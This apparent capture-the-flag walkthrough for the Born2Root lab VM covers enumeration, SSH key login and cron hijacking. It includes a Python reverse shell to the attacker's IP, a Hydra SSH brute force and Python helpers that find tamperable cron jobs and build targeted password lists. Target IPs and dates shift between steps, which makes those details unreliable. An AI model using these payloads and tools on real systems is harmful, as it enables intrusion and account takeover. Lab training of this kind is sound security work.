
Exploitation Guide for Born2Root

Summary

Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.

Enumeration

Nmap

We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.

kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
111/tcp open  rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title:  Secretsec Company 
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          39832/tcp6  status
|   100024  1          47504/udp   status
|   100024  1          50443/udp6  status
|_  100024  1          52205/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have a web server running on port 80. Browsing to the website, we find a company web page with general and contact-related information.

We should take note of the username martin, which appears twice on this page: in the About Us section and in the Contact Us section. Names found on a corporate site are prime candidates for local account names.

GoBuster

We will use GoBuster to run a brute-force directory scan with the common.txt wordlist, in an attempt to discover any other folders present on the web server.

kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...

Among the results is the /icons directory. Browsing to it, we find a text file named VDSoyuAXiO.txt that contains an SSH private key. We download the key and save it to a file:

kali@kali:~$ curl http://192.168.54.49/icons/VDSoyuAXiO.txt -o born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----

Exploitation

Local SSH Access

Let's give the key the restrictive permissions ssh requires (it refuses to use a private key that other users can read) and use it to log in as martin. The login greets us with a prompt for a secret password; we can just press Enter, since the key is what actually authenticated us.

kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh martin@192.168.120.52 -i born 
...

READY TO ACCESS THE SECRET LAB ? 

secret password : 
WELCOME ! 
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)

Escalation

Local Enumeration

Checking the cronjobs scheduled on the system, we find a job that runs a Python script every five minutes as the user jimmy. The script lives in /tmp, a world-writable directory, so any local user can create or replace it.

martin@debian:~$ cat /etc/cron*
...
*/5   * * * *   jimmy   python /tmp/sekurity.py
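Rather than eyeballing cat output, the same check can be scripted. The following is an added example, not part of the original write-up: it parses system-crontab syntax (/etc/crontab and /etc/cron.d/*, which carry a user field) and flags jobs that run as a different user from a script we can write to or create. The crontab text below is constructed to mirror Born2Root, and the function names are mine.

```python
"""Find cron jobs whose script a local user can tamper with (added example)."""
import os
import re

# Constructed sample, modelled on the Born2Root /etc/crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 * * * * jimmy python /tmp/sekurity.py
"""

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "php"}


def parse_system_crontab(text):
    """Return (schedule, user, command) tuples from system-crontab text.

    Blank lines, comments and VAR=value assignments are skipped.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        parts = line.split(None, 6)          # 5 schedule fields, user, rest
        if len(parts) < 7:
            continue
        entries.append((" ".join(parts[:5]), parts[5], parts[6]))
    return entries


def script_path(command):
    """The file the job really executes: the interpreter's first argument
    when an interpreter is used, otherwise the first word of the command."""
    words = command.split()
    if not words:
        return None
    if os.path.basename(words[0]) in INTERPRETERS and len(words) > 1:
        return words[1]
    return words[0]


def tamperable_jobs(entries, me, can_write=None):
    """Jobs run as another user whose script (or its directory) we can write.

    can_write(path) -> bool is injectable so the logic is testable offline.
    The default asks the kernel via os.access and, when the script does not
    exist yet, checks its directory: creating a missing script is as good as
    editing an existing one.
    """
    if can_write is None:
        def can_write(path):
            if os.path.exists(path):
                return os.access(path, os.W_OK)
            return os.access(os.path.dirname(path) or ".", os.W_OK)
    hits = []
    for schedule, user, command in entries:
        path = script_path(command)
        if user != me and path and path.startswith("/") and can_write(path):
            hits.append((schedule, user, path))
    return hits


if __name__ == "__main__":
    jobs = parse_system_crontab(SAMPLE_CRONTAB)
    # Simulated rule for the sample: only /tmp is writable to us.
    for hit in tamperable_jobs(jobs, me="martin", can_write=lambda p: p.startswith("/tmp/")):
        print("tamperable:", hit)
```

On a real target, read /etc/crontab and every file under /etc/cron.d and pass the concatenated text in; the default can_write then reflects the actual permissions of the user you are running as. Jobs whose command begins with a relative name (cd, test) are ignored because they are not files we could replace.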

Reverse Shell

We can write a Python reverse shell to /tmp/sekurity.py and wait up to five minutes for the cronjob to run it as jimmy. No chmod +x is needed: cron starts the script through the python interpreter, which only has to be able to read it. The connect-back address and port are those of our Kali machine (192.168.63.200:80 here); port 80 is a good choice because outbound HTTP is rarely blocked.

import socket, subprocess, os

# Connect back to the listener on the attacking machine.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.63.200", 80))

# Point stdin, stdout and stderr of this process at the socket ...
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# ... so the interactive shell talks to us. It runs as jimmy because cron does.
subprocess.call(["/bin/sh", "-i"])

Before the next run, we set up a netcat listener on our Kali machine on the port the payload connects to, so that we catch the reverse shell when the cronjob fires on the target.

After a few minutes, we catch our shell:

kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.49.54] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$

SSH Login Brute-Force

Let’s check /etc/passwd to get a list of available users on the system:

jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash

The user Hadi stands out as another user also mentioned on the company website.

Rather than throwing the whole of rockyou.txt at SSH, we build a small targeted list: passwords that contain the username are a common pattern, so we keep only the rockyou entries matching hadi.

kali@kali:~$ grep hadi /usr/share/wordlists/rockyou.txt > /home/kali/hadi.txt

Now we brute-force the password for hadi with Hydra. We keep the task count low (-t 4), which is what Hydra itself recommends for SSH, since OpenSSH limits concurrent unauthenticated connections. Note that -l takes the literal login name (-L would take a file of usernames):

kali@kali:~$ hydra -t 4 -l hadi -P /home/kali/hadi.txt 192.168.120.52 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.120.52:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.120.52   login: hadi   password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26
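The grep above only keeps passwords that already exist in rockyou. The following added example (mine, not from the original write-up) goes a step further: it filters a wordlist the same way and then adds the usual username mutations (case, digit suffixes, years, l33t), so a thin candidate list still covers a password like hadi123 even if it were missing from the wordlist. The mini-wordlist is constructed; point it at rockyou.txt for real use.

```python
"""Build a username-targeted candidate list for a single-user SSH brute force."""
import itertools

# Constructed stand-in for a handful of rockyou.txt lines.
SAMPLE_WORDLIST = """\
123456
password
hadi
chadi
hadi1
shadiest
letmein
""".splitlines()


def filter_wordlist(words, username):
    """Keep entries containing the username; like `grep hadi rockyou.txt`
    but case-insensitive, so Hadi123 is not missed."""
    u = username.lower()
    return [w for w in words if u in w.lower()]


def mutate(username, years=range(2015, 2021)):
    """Generate the common username-derived candidates."""
    bases = {username.lower(), username.capitalize(), username.upper()}
    suffixes = ["", "1", "12", "123", "1234", "!", "123!", "@123"]
    suffixes += [str(y) for y in years] + [str(y)[2:] for y in years]
    leet = str.maketrans("aeios", "43105")
    out = []
    for base in sorted(bases):
        for suf in suffixes:
            out.append(base + suf)
        out.append(base.translate(leet))
    return out


def build_candidates(username, wordlist):
    """Wordlist hits first (real-world passwords), then mutations, deduplicated
    while preserving order so Hydra tries the likeliest guesses first."""
    seen = set()
    ordered = []
    for w in itertools.chain(filter_wordlist(wordlist, username), mutate(username)):
        if w not in seen:
            seen.add(w)
            ordered.append(w)
    return ordered


if __name__ == "__main__":
    cands = build_candidates("hadi", SAMPLE_WORDLIST)
    with open("hadi.txt", "w") as fh:
        fh.write("\n".join(cands) + "\n")
    print(len(cands), "candidates written to hadi.txt; now run:")
    print("hydra -t 4 -l hadi -P hadi.txt <target> ssh")
```

Keeping the list short matters here: at the roughly 24 tries per minute Hydra manages against this host with four tasks, every extra thousand candidates costs about forty minutes.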

 

We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:

jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Escalation to Root

The root password was reused and is the same as hadi's: hadi123. Password reuse between an ordinary account and root is all it takes to turn a brute-forced user into a full compromise.

hadi@debian:~$ su -
Password:
root@debian:~# whoami
root

Cronjob Explained

With root we can confirm, in /etc/crontab, the system-wide entry that handed us the jimmy shell:
root@debian:/var/spool/cron# cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
The Rabbit Hole

Landing in jimmy's home directory after the cron shell, the obvious target is a setuid-root binary called networker. It is a rabbit hole. It takes no input, opens no ports, and strings shows it just calls system() on three fixed commands: /sbin/ifconfig, /bin/ping -c 1 localhost and echo 'echo linux tool version 5'. The first two use absolute paths, and echo is a builtin of the /bin/sh that system() spawns, so there is no PATH hijack. The file is also world-writable (-rwsrwxrwx), but that does not help either: Linux clears the setuid bit as soon as an unprivileged user writes to or truncates a setuid file, and moving a new file over it gives a file that was never setuid. Patching the binary in place is out of scope for an intermediate VM, so the password route above is the intended path.

The enumeration that shows all this, from the shell we caught as jimmy:

kali@kali:~$ sudo nc -nlvp 80
Password: 
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 *** 
/sbin/ifconfig
/bin/ping -c 1 localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$
